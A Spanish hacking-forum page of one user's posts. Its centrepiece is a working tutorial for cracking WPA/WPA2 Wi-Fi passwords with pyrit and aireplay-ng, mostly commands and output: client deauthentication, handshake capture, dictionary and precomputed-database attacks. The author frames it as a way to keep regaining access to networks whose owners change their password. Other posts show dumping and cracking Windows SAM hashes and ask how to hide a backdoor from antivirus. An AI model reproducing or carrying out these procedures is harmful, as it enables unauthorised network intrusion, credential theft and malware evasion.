Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - t0n4

#1
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen aporte @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , como concejo te diría que complementes tu aporte con imágenes.

Saludos!

Gracias por el comentario, tomare en cuenta tu consejo!

Saludos!
#2
 Hola a toda la comunidad underc0de, hace ya algun tiempo que visito el foro y creo que ya es hora de hacer un aporte a la comunidad, este es mi primer post y quiero compartir con la comunidad este tutorial basico de pyrit(una exelente herramienta para el cracking de passwords WPA/WPA2), la cual viene instalada por defecto en Kali-Linux 2.0. Espero les sea de utilidad.

 
  Estas son las obciones que estaremos utilizando en este tutorial:

  Uso: pyrit [opciones] commando

opciones:
  -b               : Filtrar APs por su direccion mac (BSSID)
  -e               : Filtrar APs por su nombre (ESSID)
  -h               : Muestra ayuda para usar un comando
  -i               : Archivo de entrada (stdin)
  -o               : Archivo de salida (stdout)
  -r               : Archivos capturados en formato pcap
   
commandos:
  analyze                 : Analizar un paquete capturado
  attack_db               : Lanzar ataque a un handshake desde la base de datos
  attack_passthrough      : Lanzar ataque a un handshake desde un archivo de texto
  batch                   : Procesar cambios en la Base de datos
  check_db                : Chequear la base de datos en busca de errores
  create_essid            : Crear un nuevo ESSID
  delete_essid            : Borrar un ESSID de la base de datos
  eval                    : Muestra informacion de la base de datos
  import_passwords        : Importar passwords desde un archivo
  list_essids             : Muestra lista de los ESSIDs en la base de datos
  strip                   : Extrar los paquetes importantes de un archivo (handshakes)
  stripLive               : Capturar paquetes
 

     
1.1-Para iniciar corremos "airmon-ng check kill all" para asegurarnos de que no alla ningun proceso que se nos interponga en medio:
------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# airmon-ng check kill all
Killing these processes:

  PID Name
  645 NetworkManager
  844 wpa_supplicant
------------------------------------------------------------------------------------------------------------------------
1.2-iniciamos nuestra interfas en modo monitor:
------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# airmon-ng start wlan0
No interfering processes found
PHY   Interface   Driver      Chipset

phy0   wlan0      ath9k      Qualcomm Atheros AR8384 Wireless Network Adapter (PCI-Express) (rev 01)
      (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
      (mac80211 station mode vif disabled for [phy0]wlan0)
------------------------------------------------------------------------------------------------------------------------

1.3-chequeamos que nuestra tarjeta inalambrica ahora esta en modo monitor:
------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# ifconfig

wlan0mon  Link encap:UNSPEC  HWaddr 72-2D-86-D3-78-54-2B-40-00-00-00-00-00-00-00-00 
          UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI  MTU:1500  Metric:1
          RX packets:11354 errors:0 dropped:236 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1677901 (1.6 MiB)  TX bytes:0 (0.0 B)
------------------------------------------------------------------------------------------------------------------------

1.4-Corremos pyrit para comenzar la captura del handshake pasandole los siguentes parametros "pyrit -r <interfas> -o <archivo.cap> stripLive", pyrit solo va a salvarnos en el archivo.cap el handshake.
------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# pyrit -r wlan0mon -o home.cap stripLive
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
This code is distributed under the GNU General Public License v3+

Parsing packets from 'wlan0mon'...
1/1: New AccessPoint 00:02:45:7A:B4:89 ('Home')
------------------------------------------------------------------------------------------------------------------------

1.5-Desconectando al cliente para obtener el handshake (aireplay-ng -0 <cantidad_de_veces> -a <mac_del_ap> -c <mac_del_cliente> <interfas>):
------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# aireplay-ng -0 3 -a 00:02:45:7A:B4:89 -c 9C:2A:70:C4:E7:C7 wlan0mon
The interface MAC (72:2D:86:D3:78:54) doesn't match the specified MAC (-h).
   ifconfig wlan0mon hw ether 00:02:45:7A:B4:89
14:37:38  Waiting for beacon frame (BSSID: 00:02:45:7A:B4:89) on channel 1
14:37:38  Sending 64 directed DeAuth. STMAC: [9C:2A:70:C4:E7:C7] [21|68 ACKs]
14:37:39  Sending 64 directed DeAuth. STMAC: [9C:2A:70:C4:E7:C7] [ 6|79 ACKs]
14:37:39  Sending 64 directed DeAuth. STMAC: [9C:2A:70:C4:E7:C7] [16|71 ACKs]
-------------------------------------------------------------------------------------------------------------------------

1.6-Luego de desconectar el cliente y esperar a que el mismo se conecte otra ves, abrimos otro terminal para comprobar si tenemos un handshake valido en el archivo.cap que salvamos anteriormente, lo hacemos pasandole los siguientes parametros a pyrit "pyrit-r <archivo.cap> analyze":
-------------------------------------------------------------------------------------------------------------------------
pyrit -r home.cap analyze
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
This code is distributed under the GNU General Public License v3+

Parsing file 'home.cap' (1/1)...
Parsed 5 packets (5 802.11-packets), got 1 AP(s)

#1: AccessPoint 00:02:45:7A:B4:89 ('Home'):
  #1: Station 9C:2A:70:C4:E7:C7, 1 handshake(s):
    #1: HMAC_SHA1_AES, good, spread 1
-------------------------------------------------------------------------------------------------------------------------
Nota: como pueden ver tenemos un hanshake valido, asi que ya podemos parar la captura de paquetes.

1.7-Ya podemos proceder a desencriptar el password con pyrit mediante un ataque de diccionario, seria asi:
-------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# pyrit -r home.cap -i passwords.txt -b 00:02:45:7A:B4:89 attack_passthrough
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
This code is distributed under the GNU General Public License v3+

Parsing file 'home.cap' (1/1)...
Parsed 5 packets (5 802.11-packets), got 1 AP(s)

Tried 3000 PMKs so far; 100 PMKs per second.

The password is '1234567890'.
----------------------------------------------------------------------------------------------------------------------------
NOTA: a 100 PMKs por segundo pyrit tardaria 100 segundos en probar 3000 posibilidades, pero la idea de este post es acelerar el proceso de crackeo verdad?

En ocaciones he tenido que hackear varias veces el password de una red porque cambian el mismo varias veces al mes y a veces cuando logro dar otra ves con el password ya lo han cambiado, para los que se han encontrado en alguna de estas situaciones, les traigo la solucion, "Base de tatos con pyrit", pyrit tiene la posibilidad de almacenar en su base de datos interna passwords pre-calculados al estilo "Rainbow Tables". La instalacion por defecto de pyrit viene con su base de datos en blanco, o sea que nosotros tenemos que crearla, lo cual nos da la posibilidad de agregar a dicha base de datos los diccionarios de nuestra preferencia y las redes que nos interesen(ESSIDs).


2- Acelerando el proceso de crackeo con pyrit desde la base de datos.

2.1-Para chequear el estado de la base de datos corremos "pyrit eval":
------------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# pyrit eval
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'...  connected.
Passwords available: 0
------------------------------------------------------------------------------------------------------------------------------

2.2-Como pueden ver la base de datos esta en blanco, para agregar passwords a nuestra base de datos corremos "pyrit -i <passwords> import_passwords":
------------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# pyrit -i passwords.txt import_passwords
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'...
3000 lines read. Flushing buffers....
All done.
------------------------------------------------------------------------------------------------------------------------------

2.3-Una ves agregados los passwords procedemos a agregar la red o las redes de nuestro interes "pyrit -e <nombre de la red> create_essid":
------------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# pyrit -e Home create_essid
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'...
Created ESSID 'Home'
------------------------------------------------------------------------------------------------------------------------------

2.4-Ya tenemos en la base de datos la informacion necesaria para proceder a pre-calcular los passwords de nuestra red, lo hacemos corriendo pyrit con el parametro batch:
------------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# pyrit batch
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Working on ESSID 'Home'
Processed all workunits for ESSID 'Home'; 200 PMKs per second.nd.
Batchprocessing done.
-------------------------------------------------------------------------------------------------------------------------------
NOTA: es importante destacar que este proceso puede tardar horas e incluso dias, en dependecia de la cantidad de passwords y de redes que agreguen a la base de datos y el rendimiento de su CPU, tambien podemos pausar este proceso cancelando la operacion con ctrl+c y luego reanudando el proceso corriendo "pyrit batch" (otra ves), el cual va a seguir donde se quedo.



2.5-Si chequeamos ahora el estado de nuestra base de datos podemos ver que la misma esta lista para ser usada:
-------------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# pyrit eval
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'...  connected.
Passwords available: 3000

ESSID 'Home'       : 3000 (100.00%)
--------------------------------------------------------------------------------------------------------------------------------


2.6-Para lanzar el ataque desde la base de datos corremos pyrit con los siguientes parametros "pyrit -r <ruta_del_handshake> -b <mac_del_ap> attack_db":
--------------------------------------------------------------------------------------------------------------------------------
root@h4cksp4c3:~# pyrit -r home-01.cap -b 00:02:45:7A:B4:89 attack_db
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'...  connected.
Parsing file 'home-01.cap' (1/1)...
Parsed 5 packets (5 802.11-packets), got 1 AP(s)

Attacking handshake with Station 00:02:45:7A:B4:89...
Tried 24131614 PMKs so far (44.7%); 1379858 PMKs per second.

The password is '1234567890'.
--------------------------------------------------------------------------------------------------------------------------------
-Como pueden ver pyrit busca el password en su base de datos a una velocidad impresionante mas de 1 millon de passwords por segundo, la proxima ves que cambien el password es solo cuestion de segundos :). Pyrit tambien nos da la posibilidad de exportar la base de datos a un archivo para trabajar con cowpatty o airolib-ng, dedicare otro post a este tema. Espero allan disfrutado este pequeno tutorial.

    Saludos a toda la comunidad!!
#3
Exelente post y muy bien explicado, gracias por el aporte, lo probe y me tomo 7h dar con la clave de mi red, creo que el tiempo tambien depende de la potencia con la que se vea el AP.

Salu2
#4
vale gracias le echaré un vistazo ahora mismo...
Saludos.
#5
Hola a todos.
Bueno yo lo hago con john, si cuentas con bt5 o kali-linux lo puedes hacer de la siguiente forma:

root@kali:~# mkdir temp

root@kali:~# cp /media/Sistema/Windows/System32/config/SAM /root/temp

root@kali:~# cp /media/Sistema/Windows/System32/config/SYSTEM /root/temp

root@kali:~# cp /root/darc0des/passwdpro.txt /root/temp

root@kali:~# cd /temp

root@kali:/tem#  bkhive SYSTEM hive
bkhive 1.1.1 by Objectif Securite
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
original author: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Root Key : CMI-CreateHive{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}
Default ControlSet: 001
Bootkey: 2a4578dbf14272c84a45df64cdfe9ccd

root@kali:/temp# samdump2 SAM hive > hashes.txt
samdump2 1.1.1 by Objectif Securite
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
original author: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Root Key : CMI-CreateHive{C4E7BA2B-68E8-499C-B1A1-371AC8D717C7}

root@kali:~# john --format=nt -w= /root/temp/passwdpro.txt /root/temp/hashes.txt
Loaded 53 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
                                        (Administrador)
superpassword            (shirylmfao)       
guesses: 0  time: 0:00:00:00 DONE (Tue May  6 10:28:12 2014)  c/s: 669800  trying: paagal - sss

bueno salen algunas cosas mas pero lo que te interesa solo es el user, que en este caso es shirylmfao y el pass que es superpassword, claro esto solo va a darte resultados si la clave esta en el diccionario, de lo contrario no vas a obtener la clave.


#6
no, recuerda que es una ATI.
#7
Ante todo hola a todos, tengo una LapTop acer aspire 5742g, 4gb de ram, cpu core i5, grafica ati mobility 5470, yo estoy usando kali-linux x64 pero no logro intalar los drivers de video, trato de intalarlos desde el repo que tengo en mi hdd y se me descontrola todo y tengo que reintalar el kali de nuevo. Les agradeceria que me ayudaran con eso, a ver de que forma, o donde puedo bajarme el driver de video...
Gracias de antemano
Salu2:  shirylmfao
#8
Buena tecnica, pero no siempre tenemos suerte con la ingenieria social, algunas veces he probado esa tecnica, y tengo que comprimir la backdoor.exe porque algunos antivurus la detectan y la eliminan.Tengo dos preguntas.

1 Hay alguna forma de que la backdoor no sea detectada por antivirus??
2 Existe alguna forma de obtener una session meterpreter a  windows 7 con alguna tecnica que no sea por ingenieria social??
Gracias de antemano..
   Salu2: shirylmfao
#9
muy bien explicado, y secillo, estoy ancioso por probarlo...
Gracias por el aporte..
#10
Presentaciones y cumpleaños / Presentacion
Mayo 04, 2014, 07:27:41 PM
Hola a toda la comunidad underc0de, soy nuevo en este mundo, y estoy muy interesado en aprender todo lo  que tenga que ver con el mundo de la informatica, me encontre este forum en la red por casualidad, y me decidi a suscribirme para aprender un poco mas y compartis mis conocimientos con otros. Soy cubano, espero no ser el unico en este forum...

Salu2:
shirylmfao